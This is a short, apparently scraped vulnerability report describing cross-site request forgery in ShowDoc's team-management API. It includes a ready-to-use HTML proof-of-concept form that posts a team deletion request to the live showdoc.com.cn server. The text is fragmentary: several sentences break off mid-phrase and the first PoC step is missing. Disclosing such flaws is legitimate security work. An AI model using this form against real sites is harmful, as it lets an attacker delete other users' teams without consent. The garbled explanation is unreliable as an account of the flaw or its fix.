Cross-Site Request Forgery (CSRF) in star7th/showdocValid
Nov 21st 2021
You set the
strict flag only for one of your cookies named
cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name
PHPSESSID don't have
Proof of Concept
38046 with the
2.open poc.html and click on submit button.
3.after that the team with id
38046 or your replaced team id will be deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST"> <input type="hidden" name="id" value="38046" /> <input type="submit" value="Submit request" /> </form> </body> </html>